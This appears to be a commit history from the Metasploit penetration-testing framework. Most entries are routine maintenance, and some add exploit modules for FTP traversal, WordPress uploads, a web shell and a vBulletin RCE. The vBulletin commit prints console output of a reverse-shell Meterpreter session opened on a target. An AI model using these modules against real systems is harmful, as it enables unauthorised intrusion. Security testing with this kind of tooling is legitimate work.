Commit Graph

36160 Commits (9d71ff6b9df43e6b7b5a8a257ecc8a683f1b48a1)

Author SHA1 Message Date
William Vu e6202e3eda Revert "Land #6060, Gemfile/gemspec updates"
This reverts commit 8f4046da40, reversing
changes made to 2df149b0a5.
2015-11-08 19:32:15 -06:00
William Vu 3e588ffd62
Land #6202, unbalanced angle brackets fixes 2015-11-08 16:26:34 -06:00
William Vu 8f4046da40
Land #6060, Gemfile/gemspec updates 2015-11-08 16:08:08 -06:00
JT e019aa12a0 Update pcman_ftp_traversal.rb 2015-11-08 13:40:23 +08:00
JT f60f2336e3 Update bison_ftp_traversal.rb 2015-11-08 13:39:32 +08:00
JT be85e85d40 Create bison_ftp_traversal.rb 2015-11-08 13:34:10 +08:00
JT bb78025dde Update pcman_ftp_traversal.rb 2015-11-08 13:27:45 +08:00
JT bf362be0a4 Update pcman_ftp_traversal.rb 2015-11-08 13:17:57 +08:00
JT bb9e820372 Create pcman_ftp_traversal.rb
Adding CVE-2015-7601
2015-11-08 13:08:23 +08:00
fraf0 970c5da9a6 Update dns_srv_enum.rb 2015-11-07 20:01:26 +01:00
fraf0 730f6b2326 Update dns_srv_enum.rb
Remove some comment following message on pull-request.
2015-11-07 15:23:32 +01:00
jvoisin e2678af0fe The modules now works on 5.1.X and 5.0.X
- Added automatic targeting
- Added support for 5.0.X
2015-11-07 14:28:25 +01:00
wchen-r7 0cc8165b52 And I forgot to rm the test line 2015-11-06 18:11:27 -06:00
wchen-r7 8f2a716306 I don't really need to override fail_with 2015-11-06 18:11:08 -06:00
wchen-r7 0213da3810 Handle more NilClass bugs 2015-11-06 18:08:51 -06:00
Jon Hart 43229c16e7
Correct some authors with unbalanced angle brackets 2015-11-06 13:24:58 -08:00
Jon Hart f34bf544d3
Update msftidy to flag authors with unbalanced angle brackets 2015-11-06 13:23:14 -08:00
William Vu 2df149b0a5
Land #6189, extraneous Content-Length fix 2015-11-06 14:36:40 -06:00
William Vu 3cae7999aa Prefer ctype over headers['Content-Type'] 2015-11-06 14:36:21 -06:00
Jon Hart f408bca3f0
More correct exception handling 2015-11-06 12:25:27 -08:00
jvazquez-r7 b01fac0e72
Land #6200, @wchen-r7's fix mixin usage on wp_ajax_load_more_file_upload 2015-11-06 14:06:35 -06:00
wchen-r7 f957acf9ba Fix Framework Rspec Failure
Needs to do:
include Msf::Exploit::Remote::HTTP::Wordpress
2015-11-06 13:56:05 -06:00
wchen-r7 fb9a40f15c
Land #6103, Add WordPress Plugin Ajax Load More Auth File Upload Vuln 2015-11-06 13:18:48 -06:00
wchen-r7 73f630b25a Note default.php 2015-11-06 13:18:24 -06:00
jvoisin f93f3397ec Fix some mistakes pointed by @wchen-r7 2015-11-06 19:35:22 +01:00
jvazquez-r7 ceaf7440a7 Send full message 2015-11-06 12:15:17 -06:00
jvazquez-r7 19652e79c3 Delete comments 2015-11-06 12:15:07 -06:00
jvazquez-r7 ca1502c00a Fix SMTP send_message to not block 2015-11-06 12:14:59 -06:00
Jon Hart 1473f2cfa7
More consistent printing 2015-11-06 10:03:06 -08:00
Jon Hart 7101ff2ecc
Better handling of motd printing 2015-11-06 09:52:12 -08:00
Jon Hart 55e224b7e7
Improve auth handling 2015-11-06 09:50:39 -08:00
Jon Hart fc97266588
Handle errors more carefully 2015-11-06 09:44:05 -08:00
Jon Hart d3ebb8ae93
Style cleanup of auth checking 2015-11-06 08:34:17 -08:00
jvoisin c540ca763c Add the EDB id 2015-11-06 17:21:28 +01:00
jvoisin 7998955b46 The double-quote character is a badchar 2015-11-06 16:43:53 +01:00
jvoisin 30e7a35452 Add the possibility to target non-default path 2015-11-06 15:33:30 +01:00
jvoisin bb0e64e541 Implement a module for the recent vBulletin RCE
This module implements the recent unserialize-powered RCE against
vBulletin 5.1.X

Step to reproduce:

1. Install vBulletin 5.1.X
2. Launch the exploit against it

```
msf exploit(vbulletin_unserialize) > check
[*] 192.168.1.25:80 - The target appears to be vulnerable.
msf exploit(vbulletin_unserialize) >
```

```
msf exploit(vbulletin) > run

[*] Started reverse handler on 192.168.1.11:4444
[*] Sending stage (33068 bytes) to 192.168.1.25
[*] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.25:49642) at 2015-11-06 14:04:46 +0100

meterpreter > getuid
Server username: www-data (33)
```
2015-11-06 14:59:25 +01:00
wchen-r7 46fac897bd
Land #6144, China Chopper Web Shell (Backdoor) module 2015-11-05 18:29:36 -06:00
wchen-r7 ea22583ed1 Update title and description 2015-11-05 18:29:03 -06:00
wchen-r7 27be832c4c remove the fail_with because it's always triggering anyway 2015-11-05 18:19:46 -06:00
dmohanty-r7 a71d7ae2ae
Land #6089, @jvazquez-r7 Fix HTTP mixins namespaces 2015-11-05 16:56:41 -06:00
wchen-r7 038cb66937 Use the right module path 2015-11-05 16:16:46 -06:00
Louis Sato 5143da14f7
Land #6193, move msftidy to correct location 2015-11-05 15:42:16 -06:00
jvazquez-r7 20679ea6c6
Land #5720, @g0tmi1k's changes to firefox_creds post module 2015-11-05 15:36:08 -06:00
Louis Sato 9c347fbaae
Land #6195, remove ff buildid from os.js 2015-11-05 15:01:15 -06:00
William Vu 2f65405a4e Fix missing brace and indent level 2015-11-05 14:30:26 -06:00
William Vu a53df44c55 Move msftidy back to tools/dev
This is where it belongs.
2015-11-05 13:56:28 -06:00
Jon Hart e96596e8eb
Credit Nixawk/all3g for some of the module review/improvements/ideas
From:
  https://github.com/rapid7/metasploit-framework/pull/6191
  https://github.com/jhart-r7/metasploit-framework/pull/5
2015-11-05 09:22:30 -08:00
Jon Hart 0ae2e64bc5
Only mark rsync as req'ing auth true/false if we are sure, otherwise vprint and unknown 2015-11-05 09:20:02 -08:00
Brent Cook ee6d6258a5
Land #6180, add PSH as a target for psexec directly, implement autodetect 2015-11-05 10:38:50 -06:00